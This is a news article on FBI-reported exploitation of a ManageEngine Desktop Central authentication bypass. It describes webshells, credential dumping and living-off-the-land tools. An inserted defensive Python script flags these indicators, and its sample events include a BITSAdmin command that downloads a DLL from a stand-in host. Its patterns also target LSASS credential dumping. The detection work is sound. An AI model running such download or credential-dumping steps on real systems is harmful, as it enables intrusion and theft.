Effective URL: https://www.zdnet.com/article/fbi-hackers-are-actively-exploiting-this-flaw-on-manageengine-desktop-central-servers/
FBI: Hackers are actively exploiting this flaw on ManageEngine Desktop Central servers

Zoho released a patch in December, but attackers are still trying to use the
flaw.

Written by Liam Tung, Contributor
Liam Tung is an Australian business technology journalist living a few too many
Swedish miles north of Stockholm for his liking. He gained a bachelor's degree in
economics and arts (cultural studies) at Sydney's Macquarie University, but
hacked (without Norse or malicious code, for that matter) his way into a career
as an enterprise tech, security and telecommunications journalist with ZDNet
Australia.

on December 21, 2021 | Topic: Security

The FBI's cyber division has issued an alert warning enterprises using
Zoho-owned ManageEngine's Desktop Central that advanced attackers have been
exploiting a flaw to install malware since late October.

Zoho released a patch for an authentication bypass flaw, CVE-2021-44515, on
December 3, warning at the time that it had seen "indications of exploitation"
and urging customers to update immediately.

Zoho didn't provide further details of the attacks at the time. They followed
activity earlier this year targeting previously patched flaws in ManageEngine
products, tracked as CVE-2021-40539 and CVE-2021-44077. However, the FBI
says in the new alert that advanced persistent threat (APT) actors have been
exploiting CVE-2021-44515 since at least October 2021.

"Since at least late October 2021, APT actors have been actively exploiting a
zero-day, now identified as CVE-2021-44515, on ManageEngine Desktop Central
servers," the FBI alert said.

Microsoft has previously attributed some of the earlier activity to a Chinese
hacking group that installed web shells on compromised servers to maintain
persistence. The flaws affected IT management products used by end-user
organizations and managed service providers.

The FBI now says it observed APT actors compromising Desktop Central servers
using the flaw, now known as CVE-2021-44515, to drop a webshell that overrides a
legitimate function of Desktop Central.

The attackers then downloaded post-exploitation tools, enumerated domain users
and groups, conducted network reconnaissance, attempted lateral movement across
the network and dumped credentials.

ManageEngine is the enterprise IT management software division of Zoho, a
company well known for its software-as-a-service products.

The flaw affects Desktop Central software for both enterprise customers and the
version for managed service provider (MSP) customers.

The FBI has filled in some details about how attackers are abusing the flaw
after obtaining samples that were downloaded from likely compromised
ManageEngine ADSelfService Plus servers.

It has seen attackers upload two variants of web shells with the filenames
emsaler.zip (variant 1, late October 2021), eco-inflect.jar (variant 1,
mid-November 2021) and aaa.zip (variant 2, late November 2021). The webshell
overrides the legitimate Desktop Central application protocol interface servlet
endpoint.

The webshell is also used for reconnaissance and domain enumeration. Eventually,
the attackers install a remote access tool (RAT) for further intrusion and
lateral movement, and dump credentials using the penetration testing tool
Mimikatz and by dumping the memory of the LSASS process.

The attackers also abused the Windows authentication protocol WDigest to recover
credentials from an LSASS dump, a sign that they were using so-called
'living off the land' techniques: legitimate, built-in tools turned to
malicious ends.

Other tools in this category include Microsoft's BITSAdmin command-line tool,
used "to download a likely ShadowPad variant dropper with filename mscoree.dll,
and a legitimate Microsoft AppLaunch binary, iop.exe", according to the FBI.
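The indicators above (the three webshell archive names, the mscoree.dll dropper fetched with BITSAdmin, and LSASS memory dumping) lend themselves to a small host-side triage pass. The following is an added example, not code from the article or from the FBI alert; it assumes Sysmon-like JSON-line endpoint events with `EventType`, `Image`, `CommandLine` and `TargetFilename` fields, and the sample events are constructed.

```python
"""Defender-side triage of constructed endpoint events for the indicators
the FBI alert ties to CVE-2021-44515 activity on Desktop Central servers."""
import json
import ntpath
from typing import Optional

# Filenames the FBI alert attributes to this activity (from the article).
WEBSHELL_NAMES = {"emsaler.zip", "eco-inflect.jar", "aaa.zip"}
DROPPER_NAME = "mscoree.dll"          # also a legitimate DLL under C:\Windows
SYSTEM_ROOT = "c:\\windows\\"         # writes below here are expected, elsewhere not

def triage(event: dict) -> Optional[str]:
    """Return a finding label for one event, or None if nothing matched."""
    kind = event.get("EventType")
    if kind == "FileCreate":
        path = event.get("TargetFilename", "")
        name = ntpath.basename(path).lower()
        if name in WEBSHELL_NAMES:
            return f"known webshell archive dropped: {name}"
        if name == DROPPER_NAME and not path.lower().startswith(SYSTEM_ROOT):
            return f"mscoree.dll written outside the Windows directory: {path}"
    elif kind == "ProcessCreate":
        image = ntpath.basename(event.get("Image", "")).lower()
        cmd = event.get("CommandLine", "").lower()
        if image == "bitsadmin.exe" and "/transfer" in cmd:
            return "BITSAdmin transfer job (living-off-the-land download)"
        if "lsass" in cmd and image != "lsass.exe":
            return f"command line referencing LSASS from {image} (possible credential dump)"
    return None

def scan(lines) -> list:
    """Run triage over JSON-line events; returns a list of (line_no, finding)."""
    findings = []
    for n, line in enumerate(lines, 1):
        if line.strip():
            hit = triage(json.loads(line))
            if hit:
                findings.append((n, hit))
    return findings

# Constructed sample events (not real telemetry); the fourth is benign noise.
SAMPLE = """
{"EventType":"FileCreate","TargetFilename":"C:\\\\ManageEngine\\\\DesktopCentral_Server\\\\webapps\\\\aaa.zip"}
{"EventType":"ProcessCreate","Image":"C:\\\\Windows\\\\System32\\\\bitsadmin.exe","CommandLine":"bitsadmin /transfer j1 http://example.invalid/m.dll C:\\\\Users\\\\Public\\\\mscoree.dll"}
{"EventType":"FileCreate","TargetFilename":"C:\\\\Users\\\\Public\\\\mscoree.dll"}
{"EventType":"FileCreate","TargetFilename":"C:\\\\Windows\\\\System32\\\\mscoree.dll"}
{"EventType":"ProcessCreate","Image":"C:\\\\Windows\\\\explorer.exe","CommandLine":"explorer.exe"}
""".strip().splitlines()

if __name__ == "__main__":
    for n, hit in scan(SAMPLE):
        print(f"line {n}: {hit}")
```

The mscoree.dll check only fires outside the Windows directory because the name also belongs to a legitimate .NET runtime DLL, so path context is what separates the dropper from the real file.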

ManageEngine has strongly advised customers to update their installations to the
latest build as soon as possible.
